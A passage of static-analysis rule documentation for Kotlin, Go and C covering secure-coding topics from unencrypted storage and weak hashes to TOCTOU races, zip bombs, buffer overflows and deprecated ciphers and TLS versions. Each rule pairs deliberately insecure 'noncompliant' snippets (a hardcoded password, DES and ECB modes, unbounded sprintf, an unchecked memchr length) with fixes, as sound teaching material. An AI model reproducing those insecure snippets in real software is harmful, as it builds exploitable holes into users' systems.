It’s recommended to password-encrypt local databases that contain sensitive information. Most systems provide secure alternatives to plain-text storage that should be used. If no secure alternative is available the data can also be encrypted manually before it is stored.

The encryption password should not be hard-coded in the application. There are different approaches to how the password can be provided to encrypt and decrypt the database. In the case of EncryptedSharedPreferences, the Android Keystore can be used to store the password. Other databases can rely on EncryptedSharedPreferences to store passwords. The password can also be provided dynamically by the user of the application, or it can be fetched from a remote server if the other methods are not feasible.

Sensitive Code Example

For SQLiteDatabase:

var db = activity.openOrCreateDatabase("test.db", Context.MODE_PRIVATE, null) // Sensitive

For SharedPreferences:

val pref = activity.getPreferences(Context.MODE_PRIVATE) // Sensitive

For Realm:

val config = RealmConfiguration.Builder().build()
val realm = Realm.getInstance(config) // Sensitive

Compliant Solution

Instead of SQLiteDatabase you can use SQLCipher:

val db = SQLiteDatabase.openOrCreateDatabase("test.db", getKey(), null)

Instead of SharedPreferences you can use EncryptedSharedPreferences:

val masterKeyAlias = MasterKeys.getOrCreate(MasterKeys.AES256_GCM_SPEC)
EncryptedSharedPreferences.create(
    "secret",
    masterKeyAlias,
    context,
    EncryptedSharedPreferences.PrefKeyEncryptionScheme.AES256_SIV,
    EncryptedSharedPreferences.PrefValueEncryptionScheme.AES256_GCM
)

For Realm an encryption key can be specified in the config:

val config = RealmConfiguration.Builder()
    .encryptionKey(getKey())
    .build()
val realm = Realm.getInstance(config)

See

kotlin:S4790

The MD5 algorithm and its successor, SHA-1, are no longer considered secure, because it is too easy to create hash collisions with them. That is, it takes too little computational effort to come up with a different input that produces the same MD5 or SHA-1 hash, and using the new, same-hash value gives an attacker the same access as if they had the originally hashed value. This applies as well to the other Message-Digest algorithms: MD2, MD4, MD6, HAVAL-128, HMAC-MD5, DSA (which uses SHA-1), RIPEMD, RIPEMD-128, RIPEMD-160, HMACRIPEMD160.

The following APIs are tracked for use of obsolete crypto algorithms:

  • java.security.AlgorithmParameters (JDK)
  • java.security.AlgorithmParameterGenerator (JDK)
  • java.security.MessageDigest (JDK)
  • java.security.KeyFactory (JDK)
  • java.security.KeyPairGenerator (JDK)
  • java.security.Signature (JDK)
  • javax.crypto.Mac (JDK)
  • javax.crypto.KeyGenerator (JDK)
  • org.apache.commons.codec.digest.DigestUtils (Apache Commons Codec)
  • org.springframework.util.DigestUtils
  • com.google.common.hash.Hashing (Guava)
  • org.springframework.security.authentication.encoding.ShaPasswordEncoder (Spring Security 4.2.x)
  • org.springframework.security.authentication.encoding.Md5PasswordEncoder (Spring Security 4.2.x)
  • org.springframework.security.crypto.password.LdapShaPasswordEncoder (Spring Security 5.0.x)
  • org.springframework.security.crypto.password.Md4PasswordEncoder (Spring Security 5.0.x)
  • org.springframework.security.crypto.password.MessageDigestPasswordEncoder (Spring Security 5.0.x)
  • org.springframework.security.crypto.password.NoOpPasswordEncoder (Spring Security 5.0.x)
  • org.springframework.security.crypto.password.StandardPasswordEncoder (Spring Security 5.0.x)

Ask Yourself Whether

The hashed value is used in a security context like:

  • User-password storage.
  • Security token generation (used to confirm e-mail when registering on a website, reset a password, etc.).
  • To compute some message integrity.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Safer alternatives, such as SHA-256, SHA-512, or SHA-3, are recommended. For password hashing, it is even better to use algorithms that do not compute too "quickly", such as bcrypt, scrypt, argon2, or pbkdf2, because this slows down brute force attacks.

Sensitive Code Example

val md1: MessageDigest = MessageDigest.getInstance("SHA");  // Sensitive: "SHA" is not a standard name; for most security providers it's an alias of SHA-1
val md2: MessageDigest = MessageDigest.getInstance("SHA1");  // Sensitive

Compliant Solution

val md1: MessageDigest = MessageDigest.getInstance("SHA-512"); // Compliant
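Hashing data with a modern digest then looks like this (a sketch in Java, which shares the MessageDigest API with the Kotlin snippet above; the hex value for "abc" is the published FIPS 180-4 SHA-256 test vector):

```java
import java.security.MessageDigest;
import java.nio.charset.StandardCharsets;

public class Digest {
    // Compute the SHA-256 digest of the input and render it as lowercase hex.
    static String sha256Hex(byte[] data) throws Exception {
        MessageDigest md = MessageDigest.getInstance("SHA-256");
        StringBuilder sb = new StringBuilder();
        for (byte b : md.digest(data)) {
            sb.append(String.format("%02x", b));
        }
        return sb.toString();
    }

    public static void main(String[] args) throws Exception {
        // Known test vector for the message "abc"
        System.out.println(sha256Hex("abc".getBytes(StandardCharsets.UTF_8)));
        // prints ba7816bf8f01cfea414140de5dae2223b00361a396177a9cb410ff61f20015ad
    }
}
```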

See

kotlin:S6293

Android comes with Android KeyStore, a secure container for storing key materials. It’s possible to define certain keys to be unlocked when users authenticate using biometric credentials. This way, even if the application process is compromised, the attacker cannot access keys, as presence of the authorized user is required.

These keys can be used to encrypt, sign, or create a message authentication code (MAC) as proof that the authentication result has not been tampered with. This protection defeats the scenario where an attacker with physical access to the device tries to hook into the application process and call the onAuthenticationSucceeded method directly. They would therefore be unable to extract the sensitive data or to perform the critical operations protected by the biometric authentication.

Ask Yourself Whether

The application contains:

  • Cryptographic keys / sensitive information that need to be protected using biometric authentication.

There is a risk if you answered yes to this question.

Recommended Secure Coding Practices

It’s recommended to tie the biometric authentication to a cryptographic operation by using a CryptoObject during authentication.

Sensitive Code Example

A CryptoObject is not used during authentication:

// ...
val biometricPrompt: BiometricPrompt = BiometricPrompt(activity, executor, callback)
// ...
biometricPrompt.authenticate(promptInfo) // Noncompliant

Compliant Solution

A CryptoObject is used during authentication:

// ...
val biometricPrompt: BiometricPrompt = BiometricPrompt(activity, executor, callback)
// ...
biometricPrompt.authenticate(promptInfo, BiometricPrompt.CryptoObject(cipher)) // Compliant

See

go:S1313

Hardcoding IP addresses is security-sensitive. It has led in the past to the following vulnerabilities:

Today’s services have an ever-changing architecture due to their scaling and redundancy needs. It is a mistake to think that a service will always have the same IP address. When it does change, the hardcoded IP will have to be modified too. This will have an impact on the product development, delivery, and deployment:

  • The developers will have to do a quick fix every time this happens, instead of having an operations team change a configuration file.
  • It encourages using the same address in every environment (dev, sys, qa, prod).

Last but not least, it has an effect on application security. Attackers might be able to decompile the code and thereby discover a potentially sensitive address. They can perform a Denial of Service attack on the service, try to get access to the system, or try to spoof the IP address to bypass security checks. Such attacks are always possible, but in the case of a hardcoded IP address, solving the issue will take more time, which increases an attack's impact.

Ask Yourself Whether

The disclosed IP address is sensitive, e.g.:

  • Can give information to an attacker about the network topology.
  • It’s a personal (assigned to an identifiable person) IP address.

There is a risk if you answered yes to any of these questions.

Recommended Secure Coding Practices

Don’t hard-code the IP address in the source code; instead, make it configurable with environment variables, configuration files, or a similar approach. Alternatively, if confidentiality is not required, a domain name can be used, since it allows the destination to be changed quickly without rebuilding the software.

Sensitive Code Example

var (
  ip   = "192.168.12.42"
  port = 3333
)

SocketClient(ip, port)

Compliant Solution

config, err := ReadConfig("properties.ini")

ip := config["ip"]
port := config["port"]

SocketClient(ip, port)

Exceptions

No issue is reported for the following cases because they are not considered sensitive:

  • Loopback addresses 127.0.0.0/8 in CIDR notation (from 127.0.0.0 to 127.255.255.255)
  • Broadcast address 255.255.255.255
  • Non-routable address 0.0.0.0
  • Strings of the form 2.5.<number>.<number> as they often match Object Identifiers (OID)
  • Addresses in the ranges 192.0.2.0/24, 198.51.100.0/24, 203.0.113.0/24, reserved for documentation purposes by RFC 5737
  • Addresses in the range 2001:db8::/32, reserved for documentation purposes by RFC 3849

See

go:S2068

Because it is easy to extract strings from an application source code or binary, credentials should not be hard-coded. This is particularly true for applications that are distributed or that are open-source.

In the past, it has led to the following vulnerabilities:

Credentials should be stored outside of the code in a configuration file, a database, or a management service for secrets.

This rule flags instances of hard-coded credentials used in database and LDAP connections. It looks for hard-coded credentials in connection strings, and for variable names that match any of the patterns from the provided list.

It’s recommended to customize the configuration of this rule with additional credential words such as "oauthToken", "secret", etc.

Ask Yourself Whether

  • Credentials allow access to a sensitive component like a database, a file storage, an API or a service.
  • Credentials are used in production environments.
  • Application re-distribution is required before updating the credentials.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Store the credentials in a configuration file that is not pushed to the code repository.
  • Store the credentials in a database.
  • Use your cloud provider’s service for managing secrets.
  • If a password has been disclosed through the source code: change it.

Sensitive Code Example

func connect()  {
  user := "root"
  password := "supersecret" // Sensitive

  url := "login=" + user + "&passwd=" + password
}

Compliant Solution

func connect()  {
  user := getEncryptedUser()
  password := getEncryptedPass() // Compliant

  url := "login=" + user + "&passwd=" + password
}

See

c:S5982

The purpose of changing the current working directory is to modify the base path used when the process resolves relative paths. When the working directory cannot be changed, the process keeps the previously defined directory as the active working directory. Verifying the success of chdir()-type functions is therefore important to prevent unintended relative path resolutions and unauthorized access.

Ask Yourself Whether

  • The success of changing the working directory is relevant for the application.
  • Changing the working directory is required by chroot to make the new root effective.
  • Subsequent disk operations are using relative paths.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

After changing the current working directory verify the success of the operation and handle errors.

Sensitive Code Example

The chdir operation could fail, leaving the process with access to unauthorized resources. The return code should be verified:

const char* any_dir = "/any/";
chdir(any_dir); // Sensitive: missing check of the return value

int fd = open(any_dir, O_RDONLY | O_DIRECTORY);
fchdir(fd); // Sensitive: missing check of the return value

Compliant Solution

Verify the return code of chdir and handle errors:

const char* root_dir = "/jail/";
if (chdir(root_dir) == -1) {
  exit(-1);
} // Compliant

const char* any_dir = "/any/";
int fd = open(any_dir, O_RDONLY | O_DIRECTORY);
if(fchdir(fd) == -1) {
  exit(-1);
} // Compliant

See

c:S5832

Why is this an issue?

Pluggable Authentication Modules (PAM) is a mechanism used on many Unix variants to provide a unified way to authenticate users, independently of the underlying authentication scheme.

When authenticating users, it is strongly recommended to check the validity of the account (not locked, not expired, etc.); otherwise, authentication can lead to unauthorized access to resources.

Noncompliant code example

The account validity is not checked with pam_acct_mgmt when authenticating a user with pam_authenticate:

int valid(pam_handle_t *pamh) {
    if (pam_authenticate(pamh, PAM_DISALLOW_NULL_AUTHTOK) != PAM_SUCCESS) { // Noncompliant - missing pam_acct_mgmt
        return -1;
    }

    return 0;
}

The return value of pam_acct_mgmt is not checked:

int valid(pam_handle_t *pamh) {
    if (pam_authenticate(pamh, PAM_DISALLOW_NULL_AUTHTOK) != PAM_SUCCESS) {
        return -1;
    }
    pam_acct_mgmt(pamh, 0); // Noncompliant
    return 0;
}

Compliant solution

When authenticating a user with pam_authenticate, check the account validity with pam_acct_mgmt:

int valid(pam_handle_t *pamh) {
    if (pam_authenticate(pamh, PAM_DISALLOW_NULL_AUTHTOK) != PAM_SUCCESS) {
        return -1;
    }
    if (pam_acct_mgmt(pamh, 0) != PAM_SUCCESS) { // Compliant
        return -1;
    }
    return 0;
}

Resources

c:S5847

Why is this an issue?

"Time Of Check to Time Of Use" (TOCTOU) vulnerabilities occur when an application:

  • First, checks permissions or attributes of a file: for instance, is a file a symbolic link?
  • Next, performs some operations such as writing data to this file.

The application cannot assume that the state of the file is unchanged between these two steps: there is a race condition (i.e., two different processes can access and modify the same shared object or file at the same time), which can lead to privilege escalation, denial of service, and other unexpected results.

For instance, attackers can benefit from this situation by creating a symbolic link to a sensitive file (e.g., /etc/passwd on Unix) directly after the first step and trying to elevate their privileges (e.g., if the written data has the correct /etc/passwd format).

To avoid TOCTOU vulnerabilities, one possible solution is to do a single atomic operation for the "check" and "use" actions, therefore removing the race condition window. Another possibility is to use file descriptors. This way the binding of the file descriptor to the file cannot be changed by a concurrent process.

Noncompliant code example

A "check" function (for instance access or stat; in this case access, to verify the existence of a file) is used, followed by a "use" function (open, fopen, etc.) to write data to a nonexistent file. These two consecutive calls create a TOCTOU race condition:

#include <errno.h>
#include <stdio.h>
#include <unistd.h>

void fopen_with_toctou(const char *file) {
  if (access(file, F_OK) == -1 && errno == ENOENT) {
    // the file doesn't exist
    // it is now created in order to write some data inside
    FILE *f = fopen(file, "w"); // Noncompliant: a race condition window exists between the access() and fopen() calls
    if (NULL == f) {
      /* Handle error */
      return;
    }

    if (fclose(f) == EOF) {
      /* Handle error */
    }
  }
}

Compliant solution

If the file already exists on disk, fopen with the "x" mode will fail:

#include <stdio.h>

void open_without_toctou(const char *file) {
  FILE *f = fopen(file, "wx"); // Compliant
  if (NULL == f) {
    /* Handle error */
  }
  /* Write to file */
  if (fclose(f) == EOF) {
    /* Handle error */
  }
}

A more generic solution is to use "file descriptors":

#include <fcntl.h>
#include <stdio.h>

void open_without_toctou(const char *file) {
  int fd = open(file, O_CREAT | O_EXCL | O_WRONLY, 0600); // a mode argument is required with O_CREAT
  if (-1 != fd) {
    FILE *f = fdopen(fd, "w");  // Compliant
    /* Write to file, then fclose(f) */
  }
}

Resources

c:S5849

Setting capabilities can lead to privilege escalation.

Linux capabilities allow you to assign narrow slices of root's permissions to files or processes. A thread with capabilities bypasses the normal kernel security checks to execute high-privilege actions such as mounting a device to a directory, without requiring (additional) root privileges.

Ask Yourself Whether

Capabilities are granted:

  • To a process that does not require all capabilities to do its job.
  • To an untrusted process.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Capabilities are high privileges, traditionally associated with the superuser (root). Make sure that only the most restrictive, necessary capabilities are assigned to files and processes.

Sensitive Code Example

When setting capabilities:

cap_t caps = cap_init();
cap_value_t cap_list[2];
cap_list[0] = CAP_FOWNER;
cap_list[1] = CAP_CHOWN;
cap_set_flag(caps, CAP_PERMITTED, 2, cap_list, CAP_SET);

cap_set_file("file", caps); // Sensitive
cap_set_fd(fd, caps); // Sensitive
cap_set_proc(caps); // Sensitive
capsetp(pid, caps); // Sensitive
capset(hdrp, datap); // Sensitive: its direct use is discouraged because it is a raw system call

When setting SUID/SGID attributes:

chmod("file", S_ISUID|S_ISGID); // Sensitive
fchmod(fd, S_ISUID|S_ISGID); // Sensitive

See

c:S5042

Successful Zip Bomb attacks occur when an application expands untrusted archive files without controlling the size of the expanded data, which can lead to denial of service. A zip bomb is usually a malicious archive of a few kilobytes of compressed data that expands into gigabytes of uncompressed data. To achieve this extreme compression ratio, attackers compress irrelevant data (e.g., a long string of repeated bytes).

Ask Yourself Whether

Archives to expand are untrusted and:

  • There is no validation of the number of entries in the archive.
  • There is no validation of the total size of the uncompressed data.
  • There is no validation of the ratio between the compressed and uncompressed sizes of each archive entry.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Define and control the threshold for maximum total size of the uncompressed data.
  • Count the number of file entries extracted from the archive and abort the extraction if their number is greater than a predefined threshold. In particular, it is not recommended to recursively expand archives (an archive entry can itself be an archive).
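
The entry-count, total-size, and ratio checks above can be sketched as plain arithmetic, independent of any archive library (the threshold values and the helper name are illustrative assumptions, not recommendations):

```cpp
#include <cstdint>

// Illustrative thresholds; tune them for the application.
constexpr int     kMaxEntries          = 1000;
constexpr int64_t kMaxTotalUncompressed = 1000000000; // 1 GB
constexpr int64_t kMaxCompressionRatio  = 100;

// Returns true if extracting one more entry of the given sizes stays within
// the thresholds; `total_uncompressed` is updated only on success.
bool entryWithinLimits(int64_t compressed_size, int64_t uncompressed_size,
                       int entries_so_far, int64_t& total_uncompressed) {
  if (entries_so_far + 1 > kMaxEntries) return false;
  if (compressed_size > 0 &&
      uncompressed_size / compressed_size > kMaxCompressionRatio) return false;
  if (total_uncompressed + uncompressed_size > kMaxTotalUncompressed) return false;
  total_uncompressed += uncompressed_size;
  return true;
}
```

Such a helper would be called once per entry before writing anything to disk, aborting the extraction on the first false.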

Sensitive Code Example

#include <archive.h>
#include <archive_entry.h>
// ...

void f(const char *filename, int flags) {
  struct archive_entry *entry;
  struct archive *a = archive_read_new();
  struct archive *ext = archive_write_disk_new();
  archive_write_disk_set_options(ext, flags);
  archive_read_support_format_tar(a);

  if ((archive_read_open_filename(a, filename, 10240))) {
    return;
  }

  for (;;) {
    int r = archive_read_next_header(a, &entry);
    if (r == ARCHIVE_EOF) {
      break;
    }
    if (r != ARCHIVE_OK) {
      return;
    }
  }
  archive_read_close(a);
  archive_read_free(a);

  archive_write_close(ext);
  archive_write_free(ext);
}

Compliant Solution

#include <archive.h>
#include <archive_entry.h>
// ...

int f(const char *filename, int flags) {
  const int max_number_of_extracted_entries = 1000;
  const int64_t max_file_size = 1000000000; // 1 GB

  int number_of_extracted_entries = 0;
  int64_t total_file_size = 0;

  struct archive_entry *entry;
  struct archive *a = archive_read_new();
  struct archive *ext = archive_write_disk_new();
  archive_write_disk_set_options(ext, flags);
  archive_read_support_format_tar(a);
  int status = 0;

  if ((archive_read_open_filename(a, filename, 10240))) {
    return -1;
  }

  for (;;) {
    int r = archive_read_next_header(a, &entry);
    if (r == ARCHIVE_EOF) {
      break;
    }
    if (r != ARCHIVE_OK) {
      status = -1;
      break;
    }

    number_of_extracted_entries++;
    if (number_of_extracted_entries > max_number_of_extracted_entries) {
      status = 1;
      break;
    }

    int64_t file_size = archive_entry_size(entry);
    total_file_size += file_size;
    if (total_file_size > max_file_size) {
      status = 1;
      break;
    }
  }
  archive_read_close(a);
  archive_read_free(a);

  archive_write_close(ext);
  archive_write_free(ext);

  return status;
}

See

c:S6069

When using sprintf, it is up to the developer to make sure the size of the buffer being written to is large enough to avoid buffer overflows. Buffer overflows can cause the program to crash at a minimum; at worst, a carefully crafted overflow can cause malicious code to be executed.

Ask Yourself Whether

  • The provided buffer is large enough for the result of any possible call to the sprintf function (including all possible format strings and all possible additional arguments).

There is a risk if you answered no to the above question.

Recommended Secure Coding Practices

There are fundamentally safer alternatives. snprintf is one of them. It takes the size of the buffer as an additional argument, preventing the function from overflowing the buffer.

  • Use snprintf instead of sprintf. The slight performance overhead can be afforded in a vast majority of projects.
  • Check the buffer size passed to snprintf.

If you are working in C++, other safe alternatives exist:

  • std::string should be the preferred type to store strings
  • You can format to a string using std::ostringstream
  • Since C++20, std::format is also available to format strings
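
As an illustration of the std::ostringstream alternative, a minimal sketch (the function name and message format are invented for the example):

```cpp
#include <sstream>
#include <string>

// Formatting with std::ostringstream: the underlying string grows as
// needed, so there is no fixed-size buffer to overflow.
std::string formatGreeting(const std::string& name, int count) {
  std::ostringstream out;
  out << "Hello " << name << ", you have " << count << " messages";
  return out.str();
}
```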

Sensitive Code Example

sprintf(str, "%s", message);   // Sensitive: `str` buffer size is not checked and it is vulnerable to overflows

Compliant Solution

snprintf(str, sizeof(str), "%s", message); // Prevent overflows by enforcing a maximum size for `str` buffer

Exceptions

It is a very common and acceptable pattern to compute the required size of the buffer with a call to snprintf with the same arguments and a null buffer (this writes nothing but returns the necessary size), then to call sprintf, as the bounds check is no longer needed. Note that 1 needs to be added to the size reported by snprintf to account for the terminating null character.

int buflen = snprintf(NULL, 0, "%s", message);
char* buf = malloc(buflen + 1); // +1 for the terminating null character
sprintf(buf, "%s", message);
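
A self-contained version of this measure-then-print pattern, with the error handling the short snippet omits (a sketch; the function name is invented for the example):

```cpp
#include <cstdio>
#include <cstdlib>
#include <string>

// Measure-then-print: the first snprintf writes nothing but returns the
// required length, so the buffer can be sized exactly before sprintf runs.
std::string formatExact(const char* message) {
  int needed = std::snprintf(nullptr, 0, "%s", message);
  if (needed < 0) return "";
  char* buf = static_cast<char*>(std::malloc(needed + 1)); // +1 for the final '\0'
  if (buf == nullptr) return "";
  std::sprintf(buf, "%s", message);
  std::string result(buf);
  std::free(buf);
  return result;
}
```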

See

c:S5547

This vulnerability makes it possible to recover the cleartext of an encrypted message without prior knowledge of the key.

Why is this an issue?

Encryption algorithms are essential for protecting sensitive information and ensuring secure communication in various domains. They are used for several important reasons:

  • Confidentiality, privacy, and intellectual property protection.
  • Security during transmission or on storage devices.
  • Data integrity, general trust, and authentication.

When selecting encryption algorithms, tools, or combinations, you should also consider two things:

  1. No encryption is unbreakable.
  2. The strength of an encryption algorithm is usually measured by the effort required to crack it within a reasonable time frame.

For these reasons, as soon as cryptography is included in a project, it is important to choose encryption algorithms that are considered strong and secure by the cryptography community.

What is the potential impact?

The cleartext of an encrypted message might be recoverable. Additionally, it might be possible to modify the cleartext of an encrypted message.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Theft of sensitive data

The encrypted message might contain data that is considered sensitive and should not be known to third parties.

By using a weak algorithm the likelihood that an attacker might be able to recover the cleartext drastically increases.

Additional attack surface

By modifying the cleartext of the encrypted message it might be possible for an attacker to trigger other vulnerabilities in the code. Encrypted values are often considered trusted, since under normal circumstances it would not be possible for a third party to modify them.

How to fix it in Botan

Code examples

The following code contains examples of algorithms that are not considered highly resistant to cryptanalysis and thus should be avoided.

Noncompliant code example

#include <botan/cipher_mode.h>

void encrypt() {
  Botan::Cipher_Mode::create("DES/CBC/PKCS7", Botan::ENCRYPTION); // Noncompliant
}

Compliant solution

#include <botan/cipher_mode.h>

void encrypt() {
  Botan::Cipher_Mode::create("AES-256/GCM", Botan::ENCRYPTION);
}

How does this work?

Use a secure algorithm

It is highly recommended to use an algorithm that is currently considered secure by the cryptographic community. A common choice for such an algorithm is the Advanced Encryption Standard (AES).

For block ciphers, it is not recommended to use algorithms with a block size that is smaller than 128 bits.

Resources

Documentation

Standards

c:S5542

This vulnerability exposes encrypted data to a number of attacks whose goal is to recover the plaintext.

Why is this an issue?

Encryption algorithms are essential for protecting sensitive information and ensuring secure communications in a variety of domains. They are used for several important reasons:

  • Confidentiality, privacy, and intellectual property protection
  • Security during transmission or on storage devices
  • Data integrity, general trust, and authentication

When selecting encryption algorithms, tools, or combinations, you should also consider two things:

  1. No encryption is unbreakable.
  2. The strength of an encryption algorithm is usually measured by the effort required to crack it within a reasonable time frame.

For these reasons, as soon as cryptography is included in a project, it is important to choose encryption algorithms that are considered strong and secure by the cryptography community.

For AES, the weakest modes are CBC (Cipher Block Chaining) and ECB (Electronic Codebook), as they are either vulnerable to padding oracles or do not provide authentication mechanisms.

For RSA, the weakest configurations either use no padding at all or use the PKCS#1 v1.5 padding scheme.

What is the potential impact?

The cleartext of an encrypted message might be recoverable. Additionally, it might be possible to modify the cleartext of an encrypted message.

Below are some real-world scenarios that illustrate possible impacts of an attacker exploiting the vulnerability.

Theft of sensitive data

The encrypted message might contain data that is considered sensitive and should not be known to third parties.

By using a weak algorithm the likelihood that an attacker might be able to recover the cleartext drastically increases.

Additional attack surface

By modifying the cleartext of the encrypted message it might be possible for an attacker to trigger other vulnerabilities in the code. Encrypted values are often considered trusted, since under normal circumstances it would not be possible for a third party to modify them.

How to fix it in Botan

Code examples

Noncompliant code example

Example with a symmetric cipher, AES:

#include <botan/cipher_mode.h>

void encrypt() {
  Botan::Cipher_Mode::create("AES-256/ECB", Botan::ENCRYPTION); // Noncompliant
}

Example with an asymmetric cipher, RSA:

#include <botan/rng.h>
#include <botan/auto_rng.h>
#include <botan/rsa.h>
#include <botan/pubkey.h>

void encrypt() {
  std::unique_ptr<Botan::RandomNumberGenerator>   rng(new Botan::AutoSeeded_RNG);
  Botan::RSA_PrivateKey                           rsaKey(*rng.get(), 2048);

  Botan::PK_Encryptor_EME(rsaKey, *rng.get(), "PKCS1v15"); // Noncompliant
}

Compliant solution

For the AES symmetric cipher, use the GCM mode:

#include <botan/cipher_mode.h>

void encrypt() {
  Botan::Cipher_Mode::create("AES-256/GCM", Botan::ENCRYPTION);
}

For the RSA asymmetric cipher, use the Optimal Asymmetric Encryption Padding (OAEP):

#include <botan/rng.h>
#include <botan/auto_rng.h>
#include <botan/rsa.h>
#include <botan/pubkey.h>

void encrypt() {
  std::unique_ptr<Botan::RandomNumberGenerator>   rng(new Botan::AutoSeeded_RNG);
  Botan::RSA_PrivateKey                           rsaKey(*rng.get(), 2048);

  Botan::PK_Encryptor_EME(rsaKey, *rng.get(), "OAEP");
}

How does this work?

As a rule of thumb, use the cryptographic algorithms and mechanisms that are considered strong by the cryptographic community.

Appropriate choices are currently the following.

For AES: Use Galois/Counter mode (GCM)

GCM mode combines encryption with authentication and integrity checks using a cryptographic hash function and provides both confidentiality and authenticity of data.

Other similar modes are:

  • CCM: Counter with CBC-MAC
  • CWC: Carter-Wegman + CTR mode
  • EAX: Encrypt-and-Authenticate
  • IAPM: Integrity Aware Parallelizable Mode
  • OCB: Offset Codebook Mode

It is also possible to use AES-CBC with HMAC for integrity checks. However, it is considered more straightforward to use AES-GCM directly instead.

For RSA: use the OAEP scheme

The Optimal Asymmetric Encryption Padding scheme (OAEP) adds randomness and a secure hash function that strengthens the regular inner workings of RSA.

Resources

Articles & blog posts

Standards

c:S5782

Why is this an issue?

Array overruns and buffer overflows happen when memory access accidentally goes beyond the boundary of the allocated array or buffer. These overreaching accesses cause some of the most damaging, and hard to track defects.

When the buffer overflow happens while reading a buffer, it can expose sensitive data that happens to be located next to the buffer in memory. When it happens while writing a buffer, it can be used to inject code or to wipe out sensitive memory.

This rule detects when a POSIX function takes one argument that is a buffer and another one that represents the size of the buffer, but the two arguments do not match.

Noncompliant code example

char array[10];
initialize(array);
void *pos = memchr(array, '@', 42); // Noncompliant, buffer overflow that could expose sensitive data

Compliant solution

char array[10];
initialize(array);
void *pos = memchr(array, '@', 10);
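
One way to keep the two arguments in sync is to derive the size from the array type itself (a sketch; this only works for true arrays, not for pointers after array decay):

```cpp
#include <cstddef>
#include <cstring>

// The size argument is taken from the array type itself, so it cannot
// drift out of sync with the buffer if the array is resized later.
template <std::size_t N>
const void* findByte(const char (&array)[N], char needle) {
  return std::memchr(array, needle, N);
}
```

Passing the array by reference preserves its size in the type, so a mismatched length can no longer be written by hand.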

Exceptions

Functions related to sockets that use the type socklen_t are not checked, because these functions follow a C-style polymorphic pattern based on unions. That pattern relies on an intentional mismatch between the allocated memory and the sizes of the structures involved, and checking it would create false positives.

Resources

c:S4423

This vulnerability exposes encrypted data to a number of attacks whose goal is to recover the plaintext.

Why is this an issue?

Encryption algorithms are essential for protecting sensitive information and ensuring secure communications in a variety of domains. They are used for several important reasons:

  • Confidentiality, privacy, and intellectual property protection
  • Security during transmission or on storage devices
  • Data integrity, general trust, and authentication

When selecting encryption algorithms, tools, or combinations, you should also consider two things:

  1. No encryption is unbreakable.
  2. The strength of an encryption algorithm is usually measured by the effort required to crack it within a reasonable time frame.

For these reasons, as soon as cryptography is included in a project, it is important to choose encryption algorithms that are considered strong and secure by the cryptography community.

To provide communication security over a network, SSL and TLS are generally used. However, it is important to note that the following protocols are all considered weak by the cryptographic community, and are officially deprecated:

  • SSL versions 1.0, 2.0 and 3.0
  • TLS versions 1.0 and 1.1

When these unsecured protocols are used, it is best practice to expect a breach: that a user or organization with malicious intent will perform mathematical attacks on this data after obtaining it by other means.

What is the potential impact?

After retrieving encrypted data and performing cryptographic attacks on it within a given timeframe, attackers can recover the plaintext that encryption was supposed to protect.

Depending on the recovered data, the impact may vary.

Below are some real-world scenarios that illustrate the potential impact of an attacker exploiting the vulnerability.

Additional attack surface

By modifying the plaintext of the encrypted message, an attacker may be able to trigger additional vulnerabilities in the code. An attacker can further exploit a system to obtain more information.
Encrypted values are often considered trustworthy because it would not be possible for a third party to modify them under normal circumstances.

Breach of confidentiality and privacy

When encrypted data contains personal or sensitive information, its retrieval by an attacker can lead to privacy violations, identity theft, financial loss, reputational damage, or unauthorized access to confidential systems.

In this scenario, the company, its employees, users, and partners could be seriously affected.

The impact is twofold, as data breaches and exposure of encrypted data can undermine trust in the organization, as customers, clients and stakeholders may lose confidence in the organization’s ability to protect their sensitive data.

Legal and compliance issues

In many industries and locations, there are legal and compliance requirements to protect sensitive data. If encrypted data is compromised and the plaintext can be recovered, companies face legal consequences, penalties, or violations of privacy laws.

How to fix it in cURL

Code examples

The following code samples attempt to create an HTTP request.

Noncompliant code example

This sample uses cURL’s default TLS protocol versions, which include the weak cryptographic protocols TLSv1.0 and TLSv1.1.

#include <curl/curl.h>

void encrypt() {
    CURL *curl;
    curl_global_init(CURL_GLOBAL_DEFAULT);

    curl = curl_easy_init();                                      // Noncompliant
    curl_easy_setopt(curl, CURLOPT_URL, "https://example.com/");

    curl_easy_perform(curl);
}

Compliant solution

#include <curl/curl.h>

void encrypt() {
    CURL *curl;
    curl_global_init(CURL_GLOBAL_DEFAULT);

    curl = curl_easy_init();
    curl_easy_setopt(curl, CURLOPT_URL, "https://example.com/");
    curl_easy_setopt(curl, CURLOPT_SSLVERSION, CURL_SSLVERSION_TLSv1_2);

    curl_easy_perform(curl);
}

How does this work?

As a rule of thumb, by default you should use the cryptographic algorithms and mechanisms that are considered strong by the cryptographic community.

The best choices at the moment are the following.

Use TLS v1.2 or TLS v1.3

Even though TLS v1.3 is available, using TLS v1.2 is still considered good and secure practice by the cryptography community.

The use of TLS v1.2 ensures compatibility with a wide range of platforms and enables seamless communication between different systems that do not yet have TLS v1.3 support.

The only drawback arises when the framework used is outdated: its TLS v1.2 settings may enable older cipher suites that have since been deprecated as insecure.

On the other hand, TLS v1.3 removes support for older and weaker cryptographic algorithms, eliminates known vulnerabilities from previous TLS versions, and improves performance.

Resources

Articles & blog posts

Standards

c:S4426

This vulnerability exposes encrypted data to attacks whose goal is to recover the plaintext.

Why is this an issue?

Encryption algorithms are essential for protecting sensitive information and ensuring secure communications in a variety of domains. They are used for several important reasons:

  • Confidentiality, privacy, and intellectual property protection
  • Security during transmission or on storage devices
  • Data integrity, general trust, and authentication

When selecting encryption algorithms, tools, or combinations, you should also consider two things:

  1. No encryption is unbreakable.
  2. The strength of an encryption algorithm is usually measured by the effort required to crack it within a reasonable time frame.

In today’s cryptography, the length of the key directly affects the security level of cryptographic algorithms.

Note that depending on the algorithm, the term key refers to a different mathematical property. For example:

  • For RSA, the key is the product of two large prime numbers, also called the modulus.
  • For AES and Elliptic Curve Cryptography (ECC), the key is only a sequence of randomly generated bytes.
    • In some cases, AES keys are derived from a master key or a passphrase using a Key Derivation Function (KDF) like PBKDF2 (Password-Based Key Derivation Function 2)

If an application uses a key that is considered short and insecure, the encrypted data is exposed to attacks aimed at getting at the plaintext.

